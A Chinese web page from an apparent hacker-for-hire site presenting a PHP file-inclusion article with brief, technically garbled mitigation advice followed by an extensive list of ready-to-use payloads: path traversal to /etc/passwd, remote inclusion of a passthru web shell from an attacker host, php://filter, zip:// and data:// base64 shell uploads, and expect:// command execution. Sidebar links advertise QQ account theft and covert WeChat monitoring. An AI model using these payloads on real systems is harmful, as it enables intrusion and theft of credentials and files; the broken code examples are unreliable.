找黑客平台

文件包含漏洞防护以及常见的文件读取payload

访客4年前关于黑客接单900

前言:与许多漏洞利用一样,文件包含漏洞是一种很常见的漏洞。本文将给您一个保护您的网站的范例,文末会提供一些文件读取的常见payload。本文将以PHP格式提供代码示例。

一、安全示例

现在请看下面的代码

<a href=https://www.freebuf.com/articles/web/index.php?page=file1.php> Files </a>
<? Php
$page=$ _GET [page];
include ($ page);
?>


这里显然不应该使用它。$page变量并未完全清除。 $page输入直接定向到网页,这是一个很大错误。这里删除通过浏览器传递的所有输入。当用户在访问网页时单击“文件”访问到“ files.php”时,将出现下面的内容。

http://localhost/index.php?page=files.php

现在,如果没有一个清理输入中变量$page,我们可以利用它执行我们的命令。如果主机在Unix/Linux服务器,我们可以读取用户密码,如下面的url所示。

http://localhost/index.php?page=.. //etc/passwd

上面的url会返回/etc/passwd

<a href=https://www.freebuf.com/articles/web/index.php?page=file1.php> Files </a>
<? Php
$ page=$ _GET [page];
include ($ page);
?>

现在假设我们输入的url如下

http://localhost/index.php?page=http://google.com/

可能是$ page变量最初放置在页面上的位置,我们得到了google.com主页。我们都知道c99(shell)可以做什么,并且如果编码人员注意的话,它们可能会包含在页面中,从而允许用户在浏览敏感文件。让我们看一下网页上可能发生的一些更简单的事情。现在,我们创建一个名为“ test.php”的文件,并将以下代码放入其中,然后保存。

<? Php
passthru ($ _ GET [cmd]);
?>

我们可以利用此文件来利用它, PHP中的passthru()函数是非常危险的。使用test.php中的这段代码,我们可以向网页发送请求,包括文件包含漏洞。如以下url所示

http://localhost/index.php?page=http: //someevilhost.com/test.php

当代码使用$_GET请求,我们必须提供一个参数传递给passthru(). 我们可以在url中这样输入。

http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd

这unix机器也将提取的文件/etc/passwd使用的cat的命令。现在我们需要知道如何控制它,使任何人都不可能执行命令,和如何包括远程执行你的服务器命令。 我们可以禁止passthru()函数。正如前文所述我们可以清除输入。我们这里可以在函数中使用一些PHP建议的结构。最初,perl的chop()函数适应了PHP,该PHP从数组中删除了空格。我们可以这样使用它。

<a href=https://www.freebuf.com/articles/web/index.php?page=file1.php> Files </a>
<? Php
$ page=chop ($ _ GET [page]);
include ($ page);
?>

php中有许多函数可以清除字符串,如htmlspecialchars()htmlentities(),stripslashes()等。我们可以在PHP中执行一个可以为所有内容的函数。如下面代码所示

<? Php
function cleanAll ($ input) {
$ input=strip_tags ($ input);
$ input=htmlspecialchars ($ input);
return ($ input);
}
?>

这里还可以使用str_replace()函数,并且还有很多其他函数可以清除它们。

更多的可以参考《php安全之道》这本书。

文件读取常见payload

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=https://www.freebuf.com/etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=..https://www.freebuf.com/articles//..https://www.freebuf.com/articles//etc/passwd

经常查看的文件

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*? ?
/proc/self/environ
/proc/version
/proc/cmdline

空字节,双编码和其他技巧

http://example.com/index.php?page=http://baidu.com/shell.txt
http://example.com/index.php?page=http://baidu.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252baidu.com%252fshell.txt

rot13和base64-php://filter 大小写

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

zip

echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php; ?
zip payload.zip payload.php;
mv payload.zip shell.jpg; ? ?
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

data

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

except

http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls

x-httpd

http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

upload

http://example.com/index.php?page=path/to/uploaded/file.png

/proc/*/fd

http://example.com/index.php?page=/proc/$PID/fd/$FD


标签: 文件包含漏洞防护以及常见的文件读取payload
返回列表

上一篇:怎样监控微信不被发现(远程微信聊天记录查看器)

下一篇:夏天什么茶叶上市(夏季是茶叶的销售淡季)

相关文章

私人调查怎么收费标准(花钱找人调查个人信息)

私人调查公司如何收费标准(掏钱请人调研私人信息) 当女性在婚姻生活中缺乏安全感的情况下,十分热衷查丈夫岗、查他的通讯记录、微信聊天记录、消费记录这些。 却不知道,这种“直接证据”全是非常容易被蒙骗...

曙光英雄兑换码有哪些 英雄礼包激活码方法分享

曙光英雄有英雄兑换码吗?也是直接领英雄的礼包码,如果有在哪里可以领取到这种兑换码?琵琶网小编接下来就给大家分享一下礼包兑换码的领取方法,希望可以帮助玩家。 曙光英雄有英雄兑换码吗? 直接送英雄的礼...

王者荣耀赵云五虎上将新皮肤图片 赵云龙胆皮肤什么时候上线?

王者荣耀赵云五虎上将新皮肤图片 赵云龙胆皮肤什么时候上线?

王者荣耀风林火山雷系列皮肤对应的是蜀国五虎上将,这个在官宣这个系列皮肤的时候就已经猜出来了,毕竟5张概念图特征还是和明显的,4月28日官宣的第一款皮肤是赵云的,这个让大家还是有些意外的,现在就来详细了...

找一个黑客盗QQ号要多少钱(黑客网站免费盗qq号)

网友都在找:盗个qq多少钱想盗一个人的号中国黑客排行求黑客帮忙盗号正在求助换一换回答问题,赢新手礼包苦等7天:最近被黑客威胁说你不发照。 这个现在很难了。光分数是不能打动别人的。除非你用RMB. 20...

共鸣元素:存在即被感知

共鸣元素:存在即被感知

CST法例是影响用户行为的视觉设计要领,分成三个环节:借助共识元素,抓住用户的感知;借助吸引力元素,强化用户的乐趣;借助行为导向元素,引导用户举办操纵,并成立发生行为的体现结果。本篇文章对第一个环节中...

合格率怎么算?怎样计算电压合格率?

合格率怎么算?怎样计算电压合格率?

供、用电设备理想的工作电压应保持额定电压。但是 在实际运行中不可能保持额定电压。总是或多或少产生上下偏移。因此,规程允许设备的运行电压比额定电压稍有出入。通常,设备电压偏移的范围是根据该设备对电压...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.